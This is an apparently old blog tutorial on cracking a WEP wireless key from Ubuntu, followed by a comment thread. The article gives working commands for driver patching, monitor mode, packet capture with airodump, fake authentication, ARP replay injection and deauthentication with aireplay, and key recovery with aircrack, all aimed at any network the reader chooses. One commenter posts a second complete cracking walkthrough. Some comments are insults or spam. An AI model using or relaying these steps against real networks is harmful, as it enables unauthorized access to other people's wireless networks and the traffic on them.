How to crack a WEP key using Ubuntu
After the article on cracking a WEP key using a MAC, many users have requested similar *testing* of their security procedures using a popular LINUX distro and WinXP. This article delves into cracking a WEP key and a WEP key force using the most popular and user friendly LINUX distro out there : UBUNTU. All you need is a laptop with a wireless card and a copy of Ubuntu Linux. NOTE: Most of the Intel wireless adapters that come in built in most laptops these days should work.
Ubuntu (IPA pronunciation: /u’buntu/) is a Linux distribution offering an operating system predominantly targeted at desktop computers. Based on Debian GNU/Linux, Ubuntu concentrates on usability, freedom from restriction of use, regular releases, and ease of installation. Ubuntu is sponsored by Canonical Ltd., by South African Mark Shuttleworth; the name of the distribution comes from the African concept of ubuntu (roughly, “humanity towards others”).
First step, obviously, is to install Ubuntu. Just boot from the CD and follow the directions. If you have problems or need help installing UBUNTU, follow this guide straight from Ubuntu. Once you have the OS installed and configured/customized to your liking we can proceed with the first step. I’d suggest performing the following steps in order, otherwise you may have problems.
Next, install the extra repositories and all the programs that Ubuntu doesn’t preinstall. Make sure your machine is able to establish a connection to the Internet. If you can only connect via wireless and are having problems, there is a package called Wi-Fi radar that is helpful. To install the extra repositories, open a terminal window and type the following:
sudo cp /etc/apt/sources.list /etc/apt/sources.list_backup
sudo gedit /etc/apt/sources.list
While in the editor, replace everything with:
## Add comments (##) in front of any line to remove it from being checked.
## Use the following sources.list at your own risk.
deb http://archive.ubuntu.com/ubuntu dapper main restricted universe multiverse
deb-src http://archive.ubuntu.com/ubuntu dapper main restricted universe multiverse## MAJOR BUG FIX UPDATES produced after the final release
deb http://archive.ubuntu.com/ubuntu dapper-updates main restricted universe multiverse
deb-src http://archive.ubuntu.com/ubuntu dapper-updates main restricted universe multiverse## UBUNTU SECURITY UPDATES
deb http://security.ubuntu.com/ubuntu dapper-security main restricted universe multiverse
deb-src http://security.ubuntu.com/ubuntu dapper-security main restricted universe multiverse## BACKPORTS REPOSITORY (Unsupported. May contain illegal packages. Use at own risk.)
deb http://archive.ubuntu.com/ubuntu dapper-backports main restricted universe multiverse
deb-src http://archive.ubuntu.com/ubuntu dapper-backports main restricted universe multiverse## PLF REPOSITORY (Unsupported. May contain illegal packages. Use at own risk.)
deb http://packages.freecontrib.org/ubuntu/plf dapper free non-free
deb-src http://packages.freecontrib.org/ubuntu/plf dapper free non-free
Save the file and exit the text editor. Next type the command:
sudo apt-get update
Now we have to install the packages we’ll need later on:
sudo apt-get install build-essential
sudo apt-get install aircrack
sudo apt-get install kismet
sudo apt-get install airsnort
sudo apt-get install linux-source
sudo apt-get install linux-headers
sudo apt-get install sharutils
Next, you should update your entire system by going to the System Menu>Administration>Update Manager. Click ‘Check’ and begin installing updates. Then reboot your system. After this is done, it’s time to patch the Madwifi drivers.
This is where everything can be tricky. My wireless card (Linksys WPC55AG) uses the Atheros driver, which I needed to patch. If you have a different driver, you’re going to need to find out whether or not you need to patch your drivers, or if they’ll even work with the Aircrack suite. The forums at aircrack-ng.org are a good place to look and so is a Google search. If you have an Atheros card, it will be called ath0 when you type iwconfig in the terminal window, or there will be a line that says Ethernet controller: Atheros Communications… when you type lspci in the terminal.
Let’s apply the madwifi patch which you’ll need if you’re using the Atheros driver. This will temporarily disable your wireless card when it deletes the old drivers of the disk. First we’re going to navigate to the /usr/src directory, download the new drivers, delete the old drivers, then install the new ones and apply the patch. You can just copy and paste the commands below into the terminal or type them yourself. So. first, let’s get the patch and then get the corresponding version of the driver
sudo -i
cd /usr/src
get http://patches.aircrack-ng.org/madwifi-ng-r1679.patch
wget http://snapshots.madwifi.org/madwifi-ng/madwifi-ng-r1679-20060707.tar.gz
ifconfig ath0 down
rmmod ath_rate_sample wlan_wep ath_rate_onoe ath_pci wlan ath_hal
find /lib/modules -name ‘ath*’ -exec rm -v {} \;
find /lib/modules -name ‘wlan*’ -exec rm -v {} \;# tar zxvf madwifi-ng-r1679-20060707.tar.gz
# cd madwifi-ng-r1679-20060707/
# patch -Np1 -i ../madwifi-ng-r1679.patch
# make
# make install
# mod_probe ath_pci
NOTE: Some people have been having problems with the modprobe command. A comment below contains a fix in some cases:
However, during Madwifi Installation I got this warning:
Warning: could not find /usr/src/madwifi/ath_hal/.hal.o.cmd for /usr/src/madwifi/ath_hal/hal.o
This warning can be IGNORED.
When I ran “modprobe ath_pci” it gave me an error message and “dmesg” gave me some gibberish about “disagrees about version of symbol”.
I browsed the web and found the solution: You have to delete the linux-restricted modules. Just search for “linux-restricted” in Synaptic. I removed everything but “linux-restricted-modules-common”. Then I compiled the madwifi again and ran “modeprobe ath_pci” again. NO ERROR this time! Authenticating and injecting works!
Apparently some network cards with atheros chipset cause problems if you don’t remove the linux-restricdet-modules.
If you are using the Atheros driver, next we need to configure kismet to use the right source. If you are using another driver you’ll have to look up what syntax you use. First navigate to the Kismet config, then change the source line.
sudo gedit /etc/kismet/kismet.conf
Change the line that begins with ’source=’ to ’source=madwifi_ag,ath0,madwifi’. Now reboot the computer. After it boots back up you should be able to access the internet again via your wireless card.
Now we can begin cracking. Open up a terminal window, enter monitor mode, and run kismet.
sudo airmon start ath0
sudo kismet
Locate the wireless network you want to crack, and note its ESSID and channel. Then exit by pressing Ctrl-C.
Next, run airodump.
sudo airodump ath0 filename channel# 1
The one at the end lets Airodump know we only want to capture IV’s. The filename can be anything you want, and will be saved in your home directory (or whatever directory you run the command from) as filename.ivs.
Copy the bssid of the wireless network from the airodump window by selecting it and pressing Shift+Ctrl+C. Open up a new terminal window so we can run aireplay to start injecting packets so our data count goes up. We want the data column in airodump to reach between 100,000 and 400,000. The more packets we have, the faster aircrack can find the WEP key. If the WEP key is 128 bits, we may need up to 1,000,000 packets.
sudo aireplay -1 0 -e ESSID -a BSSID -h 0:1:2:3:4:5 ath0
This should associate the network with the wireless connection. If it times out repeatedly, you need to be closer to the wireless router or change your interface rate by typing ’sudo iwconfig ath0 rate 1M’.
Next we want to start injecting packets.
sudo aireplay -3 -b BSSID -h 0:1:2:3:4:5 ath0
At first, it will only read packets, and say 0 ARP requests and 0 packets sent. Just wait a minute or two and it will start sending packets in large quantities. If it returns text that says it has been deauthorized, press Ctrl+C and run the command again. You can try to speed things up by entering this command:
sudo aireplay -0 ath0 -a BSSID ath0
Otherwise just sit back and wait. As soon as packets begin to be sent, the data field in Airodump should start flying. Wait until the desired number of packets have been recieved, then open a new terminal window and run aircrack.
sudo aircrack filename.ivs
After a minute, aircrack should return the WEP key. If it doesn’t, collect more packets.
Dear visitor, if you enjoyed reading this post, you may want to subscribe to my RSS feed. Thanks for visiting!
The links to the madwifi patch are broken.
Hi John. Thanks for bringing it to our notice. The link to MadWifi has been updated. All other links on this post have been verified too.
these instructions are wrong
tar zxvf madwifi-cvs-20051025.tar.gz
cd madwifi
patch -Np1 -i ../madwifi-cvs-20051025.patch
make && make install
the tar command is obviously wrong.. you updated the file link remember?
and the patch command don’t work as well.
Damm.. Thanks Jim. I have updated the tar instructions. Please note that I have also changed the link for the madwifi as well as the patch. The tar instructions and the wget command should work properly now.
problem finding and loading http://packages.freecontrib.org/ubuntu/plf
IN
”
## PLF REPOSITORY (Unsupported. May contain illegal packages. Use at own risk.)
deb http://packages.freecontrib.org/ubuntu/plf dapper free non-free
deb-src http://packages.freecontrib.org/ubuntu/plf dapper free non-free
“
this link to
http://packages.freecontrib.org/ubuntu/plf
is down, any chance of putting it back up
I have ipw3945. How can I patch it to inject?
Does anyone test it?
get http://patches.aircrack-ng.org/madwifi-ng-r1679.patch
not working could some 1 plz reup/relink?
to 10: # OOzy ipw3945 injecting works with wifislax / wifiway without patching.
6: jim # try this ubuntu tuto http://en.airdump.net/hacks/hacking-wifi-ultimate-ubuntu-guide/
or packet injection winfows tuto http://en.airdump.net/hacks/packet-injection-windows/
hey look, i had some problems after running:
ifconfig ath0 down
and
rmmod ath_rate_sample wlan_wep ath_rate_onoe ath_pci wlan ath_hal
i got this:
root@linux:/usr/src# ifconfig ath0 down
ath0: ERROR while getting interface flags: No such device
root@linux:/usr/src# rmmod ath_rate_sample wlan_wep ath_rate_onoe ath_pci wlan ath_hal
ERROR: Module ath_rate_sample does not exist in /proc/modules
ERROR: Module wlan_wep does not exist in /proc/modules
ERROR: Module ath_rate_onoe does not exist in /proc/modules
could u help me out ? thanks
Thanks for your guide.
Have you ever tried to install aircrack on macbook 2,0 ghz with ubuntu for amd64? Does it work?
hi i have this problem my wireless card uses atmel drivers i don’t know how to patch it
I have tried using this guide with Ubuntu 7.04 and a Ubiquiti SRC 300mW (Atheros based) pc card. I’ve had spotty luck getting aircrack and kismet to work consistently. Your tutorial never says which version of Ubuntu you are using. I am suspicious the included drivers are not the best source — but I have not had any luck on uninstalling the restricted modules and installing new drivers with a patch. Any ideas would be appreciated…
Out of date.
BUT please make new one.
It looks as the best for atheros drivers.
THANK YOU, I WOULD APPRECIATE IT!!!!!
Any chance of this getting updated for 7.10? This looks like the best guide Iv found so far.
Thanks!
when I typethis
rmmod ath_rate_sample wlan_wep ath_rate_onoe ath_pci wlan ath_hal
I have this:
ERROR: Module wlan_wep does not exist in /proc/modules
ERROR: Module ath_rate_onoe does not exist in /proc/modules
ERROR: Module ath_pci does not exist in /proc/modules
ERROR: Module wlan is in use by wlan_scan_sta
Am I doinf something wrong?
it would be great if u can update this howto for 7.10 gutsy. thx!
i get this when i type in
rmmod ath_rate_sample wlan_wep ath_rate_onoe ath_pci wlan ath_hal
i get this
ERROR: Module ath_rate_sample is in use
ERROR: Module wlan_wep does not exist in /proc/modules
ERROR: Module ath_rate_onoe does not exist in /proc/modules
ERROR: Removing ‘ath_pci’: Operation not permitted
ERROR: Module wlan is in use by wlan_scan_sta,ath_rate_sample,ath_pci
ERROR: Module ath_hal is in use by ath_rate_sample,ath_pci
———————————–
and when i type this in
cd madwifi-ng-r1679-20060707/
i get this
bash: cd: madwifi-ng-r1679-20060707/: No such file or directory
—————————————-
and this type this in
patch -Np1 -i ../madwifi-ng-r1679.patch
i get this
patch: **** Can’t open patch file ../madwifi-ng-r1679.patch : No such file or directory
————————————
and there are a lot of stuff that will not work like
sudo airodump ath0 filename channel# 1
it say command not found. please help me out.
well i need help getting internet on my psp….any help?????
sure i use “?” to purchase my dinner… you seem to have so many question marks that you don’t need.
So many in fact that you feel it’s ok to dump a truck load of them after every inane question you spout of your mouth.
please spend your remaining time on this planet doing nothing else but refreshing this page in the hope that you will gain a glimpse of my promised response.
lol
im using SENAO USB antenna with atheros chip. ndiswrapper is working fine with the atheros driver..shud i switch to madwifi?
hello everybody, i am new to ubuntu and to linux and i am no expert in computers either. i dont want everyone to do all the homework for me but i need HELP!
i read this article but i get stuck in many things, like what is “sudo” , how do i “open a terminal” , how is that “terminal” executed, how do i know which type is my antenna etc etc.
can anyone indicate me a place where i can get familiar with all this new things to me? thanks a lot.
another thing, since i am already in this page for real interest. couldnt there be a simpler way of cracking a WEP key? like one application or program (or whatever the name is) with inside ALL these things, so that with one simple click one gets it, the program doing all this stuff for me?
thanks a lot again, i will be grateful to any help.
yes there is a program or rather OS called backtrack which has all these programs installed. I personally use Ubuntu as my linux OS distro. now if you have Ubuntu what you have to do is open a terminal (shell) and type: sudo -i, what this does is make it so all your commands run on root (enter your password for your login when it asks for it after typing sudo -i
next type:
apt-get install aircrack-ng
what this does is install the aircrack suite (includes airmon-ng, airodump-ng, aircrack-ng, aireplay-ng, airtun-ng, and not sure what else).
after that is done installing type: airmon-ng
this shows all the wireless interface cards you have connected to your computer
pick one you want to use and type : airmon-ng start *your chosen interface* –mine is eth2
next type: airodump-ng *your chosen interface*
this will start scanning your surroundings for a network to crack. It will include all the info like the bssid, essid, channel, how many packets, how close you are to the access point.
chose an access point that has alot of packets coming in (and make sure it is WEP)
open a new terminal by pressing: ctrl+shift+N
type: airodump-ng -w *any file name you want* –bssid *the MAC address of the network your going to hack* -c *the channel of that network* *and your chosen interface*
example: airodump-ng -w passcode –bssid 00:11:22:33:44:55 -c 9 eth2
with any luck it will start collecting packets and save it in a file called passcode (or whatever you put) .cap
after it has collected at least 5000 packets open a new terminal
and type in: dir
this shows what is in the folder… your looking for yourfilenameyouchose-01.cap
highlight and copy this by double clicking it in the terminal and right-clicking
next type: aircrack-ng -a 1 -b *mac address your cracking* yourfilenameyouchose-01.cap
example: aircrack-ng -a 1 -b 00:11:22:33:44:55 passcode-01.cap
hit enter and if you have enough packets it should say key found… take that key and try connecting to the access point you cracked… when it asks for the key just type that key you just got into the the text box… if you followed this it should work for you on ubuntu… you can email me at vampyyri1123@hotmail.com if you have any questions
do you plan on making a hardy version of this tutorial anytime soon? or does anybody know of a link to a really good, easy one that a linux beginner like me could try?
dexter. You need way more knowledge than you have to even get started with this tutorial.
And about an all in one program, your thinking like a windoze user. The all in one program mentality is very limiting. These are individual tools that are simple yet effective.
But your going to have to know how to use the terminal and get familiar with linux before you even start this, or you will waste alot of time.
Blindisde – thank you very much, i see more clearly now what you say. it’s true, linux and windows have different ways of thinking. i have to get more familiar with the linux environment and way of working. thanks a lot lets hope i manage!
this guid is so good – but it needs to be updated.
this is out of date “http://patches.aircrack-ng.org/madwifi-ng-r1679.patch”
and should be replaced with :”http://patches.aircrack-ng.org/madwifi-ng-r3745.patch”
Also i think that “get” is wrong and should be “wget”
but i only started using linix yesterday – so i dont know
http://snapshots.madwifi.org/madwifi-ng/madwifi-ng-r1679-20060707.tar.gz
should be this one instead:
http://snapshots.madwifi.org/madwifi-trunk/madwifi-trunk-r3867-20080924.tar.gz
ooops, I am sorry, I do not know why it submitted my post twice, it was by mistake
Can’t compile all the packages…
deb http://packages.freecontrib.org/ubuntu/plf dapper free non-free
that link is still down. Any suggestions?
I tried these commands in my eee pc with its atheros card.
1. The links are dead. You can not download anything
2. I found the files from other sites.
3. My wireless card is not working any more.
Can any one give an advice how ro remake all work again?
Thank you.
“02:00.0 Network controller: Intel Corporation PRO/Wireless 4965 AG or AGN Network Connection (rev 61)”
i believe this to be my wireless driver, I went to http://www-307.ibm.com/pc/support/site.wss/MIGR-62875.html and downloaded the driver like the steps said to above. Now in this step of the process
“Change the line that begins with ’source=’ to ’source=madwifi_ag,ath0,madwifi’. Now reboot the computer. After it boots back up you should be able to access the internet again via your wireless card.”
what exactly do I type into terminal?
thanks good tutorial but a bit out of date
It requires so much effort…ehhh… Can somebody tell me how to install Aircrack in Ubuntu. I have it on my desktop but when I do sudo apt-get install aircrack I’m getting packet not found… I’m only new to Linux so if somebody can explain that to me in an easy way I would be very grateful
cheers.B
yes type in sudo apt-get install aircrack-ng
this should get it
sudo is to run things pretty much as a administrator
“eh ” ? lol. what is that ?
If you really want to show how lazy you are, you would of learnt about tab completion in the terminal.
you’re pathetic…
hey people i need urgent help with ipw2100 3b driver.i couldnt find any patch for that ,can someone help me,im also new too linux
thanks
Hi thanks for this tutorial..its an excellent tutorial but unfortunately i have some problem..and i couldn’t get the WEP key..here is my ethernet controller details..does it support aircrack-ng
05:00.0 Ethernet controller: Marvell Technology Group Ltd. 88E8039 PCI-E Fast Ethernet Controller (rev 14)
07:00.0 Network controller: Intel Corporation PRO/Wireless 3945ABG [Golan] Network Connection (rev 02)
err you guys…
for the people having trouble with anything to do with ‘ath’ related commands is probably cus you dont have an atheros wireless card…. pneumetic… and stuff… srsly you guise :S
You’re english is horrible.
So is yours
Want to get free xbox live? Go to http://www.myfreexboxlive.com/
No please end yourself.
ARP linktype is set to 1 (Ethernet) – expected ARPHRD_IEEE80211,
ARPHRD_IEEE80211_FULL or ARPHRD_IEEE80211_PRISM instead. Make
sure RFMON is enabled: run ‘airmon-ng start eth1 ‘
Sysfs injection support was not found either.
THIS IS WHAT I GET WHEN I DO THE AIRODUMP-NG
PLEASE HELP
AND THE LINK IS THE DOWN TO THE PATCH
what card do you have? cuz i have both a wusb54gc linksys and a wpc11v3 linksys and when i run vmware player in windows for backtrack 3 it works but when i boot ubuntu it only lets me use the actual wifi network card
i got the same thing when i tried to start my wifi usb so i use my external network card
Сорри за оффтоп, не подскажете, где мона такой же симпатичный шаблон для блога взять?
Do you think this will work for me? I know my WEP password and can’t connect with ubuntu! Ubuntu wireless configuration tools are useless IMHO. I enter a passphrase and the dialog comes back asking for it, with a different passphrase entered… junk!
No if you have to ask then it will never work for you.
I tried to install this in Ubuntu 9.10 and some things installed some didn’t and I have aircrack instaled in Ubuntu 9.10 but can’t find it or any other tools that whent with it I put the file we edited back to normal since it never worked it would be nice if a person could make a package that worked with ubuntu 91.0 so when he goes out to diag, a network and people forgot the password of the network and don’t remember the admin password and have to meny computers to reconfigure if they did a reset..
DAATE?????
Clearly you’re retarded, stop dribbling on the keyboard.